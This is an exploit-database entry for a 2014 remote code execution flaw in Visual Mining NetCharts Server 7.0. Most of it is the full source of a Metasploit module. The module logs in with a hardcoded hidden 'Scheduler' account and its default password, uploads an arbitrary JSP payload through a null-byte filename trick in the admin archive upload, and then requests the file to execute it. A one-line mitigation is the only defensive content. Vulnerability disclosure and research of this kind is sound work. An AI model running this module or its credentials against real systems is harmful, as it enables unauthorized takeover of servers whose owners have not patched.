Visual Mining NetCharts Server Remote Code Execution

vendor:

NetCharts Server

by:

sghctoma, juan vazquez

9,8

CVSS

CRITICAL

Arbitrary JSP Code Upload

CWE

Product Name: NetCharts Server

Affected Version From: Visual Mining NetCharts Server 7.0

Affected Version To: Visual Mining NetCharts Server 7.0

Patch Exists: YES

Related CWE: CVE-2014-8516, ZDI-14-372

CPE: a:visual_mining:netcharts_server:7.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Windows

2014

Visual Mining NetCharts Server Remote Code Execution

This module exploits multiple vulnerabilities in Visual Mining NetCharts. First, a lack of input validation in the administration console permits arbitrary jsp code upload to locations accessible later through the web service. Authentication is typically required, however a 'hidden' user is available by default (and non editable). This user, named 'Scheduler', can only login to the console after any modification in the user database (a user is added, admin password is changed etc). If the 'Scheduler' user isn't available valid credentials must be supplied. The default Admin password is Admin.

Mitigation:

Input validation should be implemented to prevent arbitrary JSP code upload.

Source

Exploit-DB raw data:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  DEFAULT_USERNAME = 'Scheduler'
  DEFAULT_PASSWORD = '!@#$scheduler$#@!'
  SIGNATURE = 'was uploaded successfully and is now ready for installation'

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Visual Mining NetCharts Server Remote Code Execution',
      'Description' => %q{
        This module exploits multiple vulnerabilities in Visual Mining NetCharts.
        First, a lack of input validation in the administration console permits
        arbitrary jsp code upload to locations accessible later through the web
        service. Authentication is typically required, however a 'hidden' user is
        available by default (and non editable). This user, named 'Scheduler',
        can only login to the console after any modification in the user
        database (a user is added, admin password is changed etc). If the
        'Scheduler' user isn't available valid credentials must be supplied. The
        default Admin password is Admin.
      },
      'Author'       =>
        [
          'sghctoma',    # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2014-8516'],
          ['ZDI', '14-372']
        ],
      'Privileged'  => true,
      'Platform'    => %w{ linux win },
      'Arch'        => ARCH_JAVA,
      'Targets'     =>
        [
          ['Visual Mining NetCharts Server 7.0', {}]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 03 2014'))

    register_options(
      [
        Opt::RPORT(8001),
        OptString.new('USERNAME', [false, "The username to authenticate with"]),
        OptString.new('PASSWORD', [false, "The password to authenticate with"])
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri('/', 'Admin', 'archive', 'upload.jsp'),
      'vars_get' => { 'mode' => 'getZip' },
      'authorization' => basic_auth(username, password)
    })

    if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE)
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
    print_status("#{peer} - Uploading JSP payload #{jsp_payload}...")
    if upload(jsp_payload, payload.encoded)
      print_good("#{peer} - JSP payload uploaded successfully")
      register_file_for_cleanup("./webapps/Admin/archive/ArchiveCache/#{jsp_payload}")
    else
      fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
    end

    print_status("#{peer} - Executing payload...")
    execute(jsp_payload, 1)
  end

  def execute(jsp_name, time_out = 20)
    res = send_request_cgi({
      'uri'    => normalize_uri('/', 'Admin', 'archive', 'ArchiveCache', jsp_name),
      'method' => 'GET',
      'authorization' => basic_auth(username, password)
    }, time_out)

    res
  end

  def upload(file_name, contents)
    post_data = Rex::MIME::Message.new
    post_data.add_part(
      contents,
      'application/octet-stream',
      nil,
      "form-data; name=\"FILE1\"; filename=\"#{file_name}\x00Archive0101140101.zip\""
    )

    res = send_request_cgi({
      'uri'    => normalize_uri("/", 'Admin', 'archive', 'upload.jsp'),
      'method' => 'GET',
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
      'data'   => post_data.to_s,
      'vars_get' => { 'mode' => 'getZip' },
      'authorization' => basic_auth(username, password)
    })

    if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE)
      true
    else
      false
    end
  end

  def username
    datastore['USERNAME'].blank? ? DEFAULT_USERNAME : datastore['USERNAME']
  end

  def password
    datastore['PASSWORD'].blank? ? DEFAULT_PASSWORD : datastore['PASSWORD']
  end
end